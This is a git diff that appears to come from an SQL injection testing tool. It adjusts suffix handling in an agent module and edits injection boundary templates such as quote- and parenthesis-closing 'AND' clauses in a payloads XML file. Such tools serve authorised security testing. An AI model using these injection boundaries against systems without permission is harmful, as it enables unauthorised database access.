diff --git a/lib/core/agent.py b/lib/core/agent.py index d34a40d2c..90fdb80b4 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -238,10 +238,7 @@ class Agent(object): pass elif suffix and not comment: - if suffix.startswith(GENERIC_SQL_COMMENT): - expression += "%s" % suffix - else: - expression += " %s" % suffix + expression += suffix return re.sub(r"(?s);\W*;", ";", expression) diff --git a/xml/payloads.xml b/xml/payloads.xml index 7b7e19d43..89036aa0b 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -274,7 +274,7 @@ Formats: 1,2 1 ) - AND ([RANDNUM]=[RANDNUM] + AND ([RANDNUM]=[RANDNUM] @@ -283,7 +283,7 @@ Formats: 1,2 1 )) - AND (([RANDNUM]=[RANDNUM] + AND (([RANDNUM]=[RANDNUM] @@ -292,7 +292,7 @@ Formats: 1,2 1 ))) - AND ((([RANDNUM]=[RANDNUM] + AND ((([RANDNUM]=[RANDNUM] @@ -310,7 +310,7 @@ Formats: 1,2 2 ') - AND ('[RANDSTR]'='[RANDSTR] + AND ('[RANDSTR]'='[RANDSTR] @@ -319,7 +319,7 @@ Formats: 1,2 2 ')) - AND (('[RANDSTR]'='[RANDSTR] + AND (('[RANDSTR]'='[RANDSTR] @@ -328,7 +328,7 @@ Formats: 1,2 2 '))) - AND ((('[RANDSTR]'='[RANDSTR] + AND ((('[RANDSTR]'='[RANDSTR] @@ -337,7 +337,7 @@ Formats: 1,2 2 ' - AND '[RANDSTR]'='[RANDSTR] + AND '[RANDSTR]'='[RANDSTR] @@ -346,7 +346,7 @@ Formats: 1,2 3 ') - AND ('[RANDSTR]' LIKE '[RANDSTR] + AND ('[RANDSTR]' LIKE '[RANDSTR] @@ -355,7 +355,7 @@ Formats: 1,2 3 ')) - AND (('[RANDSTR]' LIKE '[RANDSTR] + AND (('[RANDSTR]' LIKE '[RANDSTR] @@ -364,7 +364,7 @@ Formats: 1,2 3 '))) - AND ((('[RANDSTR]' LIKE '[RANDSTR] + AND ((('[RANDSTR]' LIKE '[RANDSTR] @@ -373,7 +373,7 @@ Formats: 1,2 3 ' - AND '[RANDSTR]' LIKE '[RANDSTR] + AND '[RANDSTR]' LIKE '[RANDSTR] @@ -382,7 +382,7 @@ Formats: 1,2 4 ") - AND ("[RANDSTR]"="[RANDSTR] + AND ("[RANDSTR]"="[RANDSTR] @@ -391,7 +391,7 @@ Formats: 1,2 4 ")) - AND (("[RANDSTR]"="[RANDSTR] + AND (("[RANDSTR]"="[RANDSTR] @@ -400,7 +400,7 @@ Formats: 1,2 4 "))) - AND ((("[RANDSTR]"="[RANDSTR] + AND ((("[RANDSTR]"="[RANDSTR] @@ -409,7 +409,7 @@ Formats: 1,2 4 " - AND "[RANDSTR]"="[RANDSTR] + AND "[RANDSTR]"="[RANDSTR] @@ -418,7 +418,7 @@ Formats: 1,2 5 ") - AND ("[RANDSTR]" LIKE "[RANDSTR] + AND ("[RANDSTR]" LIKE "[RANDSTR] @@ -427,7 +427,7 @@ Formats: 1,2 5 ")) - AND (("[RANDSTR]" LIKE "[RANDSTR] + AND (("[RANDSTR]" LIKE "[RANDSTR] @@ -436,7 +436,7 @@ Formats: 1,2 5 "))) - AND ((("[RANDSTR]" LIKE "[RANDSTR] + AND ((("[RANDSTR]" LIKE "[RANDSTR] @@ -445,7 +445,7 @@ Formats: 1,2 5 " - AND "[RANDSTR]" LIKE "[RANDSTR] + AND "[RANDSTR]" LIKE "[RANDSTR] @@ -454,7 +454,7 @@ Formats: 1,2 2 %') - AND ('%'=' + AND ('%'=' @@ -463,7 +463,7 @@ Formats: 1,2 2 %')) - AND (('%'=' + AND (('%'=' @@ -472,7 +472,7 @@ Formats: 1,2 2 %'))) - AND ((('%'=' + AND ((('%'=' @@ -481,7 +481,7 @@ Formats: 1,2 2 %' - AND '%'=' + AND '%'=' @@ -490,7 +490,7 @@ Formats: 1,2 2 %00') - AND ('[RANDSTR]'='[RANDSTR] + AND ('[RANDSTR]'='[RANDSTR] @@ -499,7 +499,7 @@ Formats: 1,2 2 %00' - AND '[RANDSTR]'='[RANDSTR] + AND '[RANDSTR]'='[RANDSTR]